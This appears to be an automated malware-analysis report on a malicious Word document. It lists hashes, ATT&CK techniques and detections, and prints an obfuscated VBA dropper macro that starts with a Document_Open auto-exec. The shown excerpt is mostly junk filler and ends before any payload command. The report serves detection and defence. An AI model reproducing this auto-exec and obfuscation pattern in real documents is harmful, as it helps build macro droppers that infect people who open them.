Office (OLE) malware analysis — malicious · 6dd5a12cae477b7e

MALICIOUS

Office (OLE)

235.0 KB Created: 2018-09-27 19:02:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: eba233b1240ca75add5f0a412d00ce48 SHA-1: 4fabad9538306aae967b005e9c5d0d01636c749b SHA-256: 6dd5a12cae477b7edeb4cbfa667f40f1a6b8e6a7fdc205f899540358beddd5c0

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that calls the Shell() function. This indicates the document is designed to execute arbitrary commands upon opening after the user enables content. The presence of a "Document instructs the user to enable macros or editing" heuristic further supports this, as does the ClamAV detection of Doc.Dropper.Agent-7085930-0. The VBA code itself is heavily obfuscated, but the Document_Open macro's intent to execute a shell command is clear.

Heuristics 7

ClamAV: Doc.Dropper.Agent-7085930-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7085930-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63988 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	63988 bytes
SHA-256: `5a8a1927b9977b41abf95d1993ddf2d8a962fa93086b0d29935ca8fed8854ede`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Set frm = New frmMain Call Hitler(frm.txtBox.Text) End Sub Attribute VB_Name = "ThGYm" Sub Hitler(gs2O8d) Dim F1pJDiq F1pJDiq = 198 While F1pJDiq < 641 F1pJDiq = F1pJDiq + 20 Wend IKcmCB = "HRrZCSu72" LCpmodYMt = gBnKbWUv & F1pJDiq Dim at6rSu at6rSu = 198 While at6rSu <= 641 at6rSu = at6rSu + 20 Wend qLQ0niU = 27899 XkR0jFcW = UmnQBDEq & at6rSu If 1580 / 4 = 22425 / 4485 Then vIxFgn = "WMalWjh" End If vyGgF75 = 27899 tnoPvT = vIxFgn & vyGgF75 Dim yIZENr52V yIZENr52V = 211 While yIZENr52V <= 381 yIZENr52V = yIZENr52V + 22 Wend Tha0C = "rjHVS93" xWwf64hV = OiBeX5lx & yIZENr52V If 12 < 160 Then ' Wrut9c Else ' oMUZHE Debug.Print "slFG9wqV" End If If 17 < 213 Then ' pUWAFTKg Else ' Yd93wJPcp Debug.Print "zIZTu" End If Dim OLWar OLWar = 42 While OLWar <= 768 OLWar = OLWar + 10 Wend GqbRQ6o = "jEwlko" RlviQ = GG5NMIy & OLWar If 734 + 8 = 7983 / 2661 Then JHfuX = "QDXoBV4" End If FnjHyIcuk = "NUOwH" MmUzHFa = JHfuX & FnjHyIcuk If 734 + 8 = 7983 / 2661 Then YLziZkn = "tzUxnM" End If KKZUbwSc = "wFjUXJ5Q" VM2CTDQnz = YLziZkn & KKZUbwSc Dim JXKTDeIW JXKTDeIW = 169 While JXKTDeIW <= 964 JXKTDeIW = JXKTDeIW + 23 Wend TcZMtGjFa = "ynagWEC7e" ZUBZk = cGgoOeB8 & JXKTDeIW If 59 < 186 Then ' d40tN Else ' iBfz4iMZ MsgBox "m3w6SxGN" End If If 59 < 186 Then ' VCAZiqhc Else ' IdZALGSJa MsgBox "MzLbBxPn" End If If 53 < 255 Then ' QQeM5UjC0 Else ' cVMhax Debug.Print "EQUqVg9NP" End If Dim YLPIk YLPIk = 175 While YLPIk < 328 YLPIk = YLPIk + 13 Wend yDnCg14r = 5733 aSPdBxEy = T9fxVl & YLPIk Dim IcvMNCbt IcvMNCbt = 213 While IcvMNCbt <= 946 IcvMNCbt = IcvMNCbt + 21 Wend Le16xY = "yD7Emk2" vCLFWow5O = h013Kn & IcvMNCbt If 28798 / 34 = 27342 / 27342 Then jNlsXTUAQ = "hiKThg" End If BKQMkvxS = 35593 nYTE0do1f = jNlsXTUAQ & BKQMkvxS If 28798 / 34 = 27342 / 27342 Then R6zchpMA = "nqd4Ebt" End If oBWGKw = "T7056Z" zNQFcvD = R6zchpMA & oBWGKw If 20 < 220 Then ' xt1Cy Else ' dFt0K6m MsgBox "sBoDH7mZ" End If If 965 - 34 = -994 + 1005 Then gPN5JIaGB = "mcLZple" End If U3Ac5n = "B8kVQCsv" DzgqPSsED = gPN5JIaGB & U3Ac5n Dim JzyxGk JzyxGk = 28 While JzyxGk < 651 JzyxGk = JzyxGk + 22 Wend QRuAGv = "HNgEonD0b" id4yp = shf6j & JzyxGk Dim BymKDRef BymKDRef = 28 While BymKDRef < 651 BymKDRef = BymKDRef + 22 Wend JTWg5G = 43086 yuJgIrq = o6HMCW5 & BymKDRef If 965 - 34 = -994 + 1005 Then soWAuGyHg = "OOK2P" End If qO76FVdAC = 43086 Wz8WEP = soWAuGyHg & qO76FVdAC Dim KnVZR7 KnVZR7 = 161 While KnVZR7 <= 459 KnVZR7 = KnVZR7 + 64 Wend OVOcSk0 = "wzSPhMmO0" X1unZz = FC4VzBQ & KnVZR7 Dim cq8Jh6Z cq8Jh6Z = 161 While cq8Jh6Z < 459 cq8Jh6Z = cq8Jh6Z + 64 Wend nzgDIyMU = "UpjvbsNzw" gjoceuq = QoA3HgBzM & cq8Jh6Z If 420 - 26 = 12678 / 2113 Then JKj7MWC = "jwgkGhaE" End If ohw7O = 31704 YVyOsk5 = JKj7MWC & ohw7O If 420 - 26 = 12678 / 2113 Then OCsgP = "FuymZ9Wo0" End If jl9bCQu = "keKPfL" fBjGaS9mO = OCsgP & jl9bCQu If 21320 / 26 = 24654 / 4109 Then pzKPcsB = "MMtJP" End If ZQvBAX = "Ie102FO" XKgWeb = pzKPcsB & ZQvBAX If 21320 / 26 = 24654 / 4109 Then iSzR2tn = "BZQdpfsHq" End If yoEO10 = "jYESj3Q" rYsHbJM = iSzR2tn & yoEO10 If 21320 / 26 = 24654 / 4109 Then DtAgoYGRQ = "SE67wdVt" End If XEfIGzAhO = 12905 VtEozPBY = DtAgoYGRQ & XEfIGzAhO If 21320 / 26 = 24654 / 4109 Then cCiZN6 = "MhGST" End If KSUJLsWd = "FEDxbC" BtyDIFb = cCiZN6 & KSUJLsWd Dim tDtKeG tDtKeG = 20 While tDtKeG < 669 tDtKeG = tDtKeG + 55 Wend q6CxyrX = "tu96ocCKe" FEqv6Wjez = pXoaS0I8k & tDtKeG If 42 < 245 Then ' MYKyM7o Else ' hAanT Debug.Print "HMkjbPi" End If If 223 - 23 = 857 - 841 Then u5XQYh = "IY2E4K" End If WrDq5hfOw = 1642 h2JAbj3EU = u5XQYh & WrDq5hfOw If 223 - 23 = 857 - 841 Then Lcik8 = "zKrReq4AQ" ... (truncated)

SHA-256: 5a8a1927b9977b41abf95d1993ddf2d8a962fa93086b0d29935ca8fed8854ede

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Set frm = New frmMain
Call Hitler(frm.txtBox.Text)
End Sub

Attribute VB_Name = "ThGYm"
Sub Hitler(gs2O8d)
Dim F1pJDiq
F1pJDiq = 198
While F1pJDiq < 641
F1pJDiq = F1pJDiq + 20
Wend
IKcmCB = "HRrZCSu72"
LCpmodYMt = gBnKbWUv & F1pJDiq
Dim at6rSu
at6rSu = 198
While at6rSu <= 641
at6rSu = at6rSu + 20
Wend
qLQ0niU = 27899
XkR0jFcW = UmnQBDEq & at6rSu
If 1580 / 4 = 22425 / 4485 Then
vIxFgn = "WMalWjh"
End If
vyGgF75 = 27899
tnoPvT = vIxFgn & vyGgF75
Dim yIZENr52V
yIZENr52V = 211
While yIZENr52V <= 381
yIZENr52V = yIZENr52V + 22
Wend
Tha0C = "rjHVS93"
xWwf64hV = OiBeX5lx & yIZENr52V
If 12 < 160 Then
' Wrut9c
Else
' oMUZHE
Debug.Print "slFG9wqV"
End If
If 17 < 213 Then
' pUWAFTKg
Else
' Yd93wJPcp
Debug.Print "zIZTu"
End If
Dim OLWar
OLWar = 42
While OLWar <= 768
OLWar = OLWar + 10
Wend
GqbRQ6o = "jEwlko"
RlviQ = GG5NMIy & OLWar
If 734 + 8 = 7983 / 2661 Then
JHfuX = "QDXoBV4"
End If
FnjHyIcuk = "NUOwH"
MmUzHFa = JHfuX & FnjHyIcuk
If 734 + 8 = 7983 / 2661 Then
YLziZkn = "tzUxnM"
End If
KKZUbwSc = "wFjUXJ5Q"
VM2CTDQnz = YLziZkn & KKZUbwSc
Dim JXKTDeIW
JXKTDeIW = 169
While JXKTDeIW <= 964
JXKTDeIW = JXKTDeIW + 23
Wend
TcZMtGjFa = "ynagWEC7e"
ZUBZk = cGgoOeB8 & JXKTDeIW
If 59 < 186 Then
' d40tN
Else
' iBfz4iMZ
MsgBox "m3w6SxGN"
End If
If 59 < 186 Then
' VCAZiqhc
Else
' IdZALGSJa
MsgBox "MzLbBxPn"
End If
If 53 < 255 Then
' QQeM5UjC0
Else
' cVMhax
Debug.Print "EQUqVg9NP"
End If
Dim YLPIk
YLPIk = 175
While YLPIk < 328
YLPIk = YLPIk + 13
Wend
yDnCg14r = 5733
aSPdBxEy = T9fxVl & YLPIk
Dim IcvMNCbt
IcvMNCbt = 213
While IcvMNCbt <= 946
IcvMNCbt = IcvMNCbt + 21
Wend
Le16xY = "yD7Emk2"
vCLFWow5O = h013Kn & IcvMNCbt
If 28798 / 34 = 27342 / 27342 Then
jNlsXTUAQ = "hiKThg"
End If
BKQMkvxS = 35593
nYTE0do1f = jNlsXTUAQ & BKQMkvxS
If 28798 / 34 = 27342 / 27342 Then
R6zchpMA = "nqd4Ebt"
End If
oBWGKw = "T7056Z"
zNQFcvD = R6zchpMA & oBWGKw
If 20 < 220 Then
' xt1Cy
Else
' dFt0K6m
MsgBox "sBoDH7mZ"
End If
If 965 - 34 = -994 + 1005 Then
gPN5JIaGB = "mcLZple"
End If
U3Ac5n = "B8kVQCsv"
DzgqPSsED = gPN5JIaGB & U3Ac5n
Dim JzyxGk
JzyxGk = 28
While JzyxGk < 651
JzyxGk = JzyxGk + 22
Wend
QRuAGv = "HNgEonD0b"
id4yp = shf6j & JzyxGk
Dim BymKDRef
BymKDRef = 28
While BymKDRef < 651
BymKDRef = BymKDRef + 22
Wend
JTWg5G = 43086
yuJgIrq = o6HMCW5 & BymKDRef
If 965 - 34 = -994 + 1005 Then
soWAuGyHg = "OOK2P"
End If
qO76FVdAC = 43086
Wz8WEP = soWAuGyHg & qO76FVdAC
Dim KnVZR7
KnVZR7 = 161
While KnVZR7 <= 459
KnVZR7 = KnVZR7 + 64
Wend
OVOcSk0 = "wzSPhMmO0"
X1unZz = FC4VzBQ & KnVZR7
Dim cq8Jh6Z
cq8Jh6Z = 161
While cq8Jh6Z < 459
cq8Jh6Z = cq8Jh6Z + 64
Wend
nzgDIyMU = "UpjvbsNzw"
gjoceuq = QoA3HgBzM & cq8Jh6Z
If 420 - 26 = 12678 / 2113 Then
JKj7MWC = "jwgkGhaE"
End If
ohw7O = 31704
YVyOsk5 = JKj7MWC & ohw7O
If 420 - 26 = 12678 / 2113 Then
OCsgP = "FuymZ9Wo0"
End If
jl9bCQu = "keKPfL"
fBjGaS9mO = OCsgP & jl9bCQu
If 21320 / 26 = 24654 / 4109 Then
pzKPcsB = "MMtJP"
End If
ZQvBAX = "Ie102FO"
XKgWeb = pzKPcsB & ZQvBAX
If 21320 / 26 = 24654 / 4109 Then
iSzR2tn = "BZQdpfsHq"
End If
yoEO10 = "jYESj3Q"
rYsHbJM = iSzR2tn & yoEO10
If 21320 / 26 = 24654 / 4109 Then
DtAgoYGRQ = "SE67wdVt"
End If
XEfIGzAhO = 12905
VtEozPBY = DtAgoYGRQ & XEfIGzAhO
If 21320 / 26 = 24654 / 4109 Then
cCiZN6 = "MhGST"
End If
KSUJLsWd = "FEDxbC"
BtyDIFb = cCiZN6 & KSUJLsWd
Dim tDtKeG
tDtKeG = 20
While tDtKeG < 669
tDtKeG = tDtKeG + 55
Wend
q6CxyrX = "tu96ocCKe"
FEqv6Wjez = pXoaS0I8k & tDtKeG
If 42 < 245 Then
' MYKyM7o
Else
' hAanT
Debug.Print "HMkjbPi"
End If
If 223 - 23 = 857 - 841 Then
u5XQYh = "IY2E4K"
End If
WrDq5hfOw = 1642
h2JAbj3EU = u5XQYh & WrDq5hfOw
If 223 - 23 = 857 - 841 Then
Lcik8 = "zKrReq4AQ"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.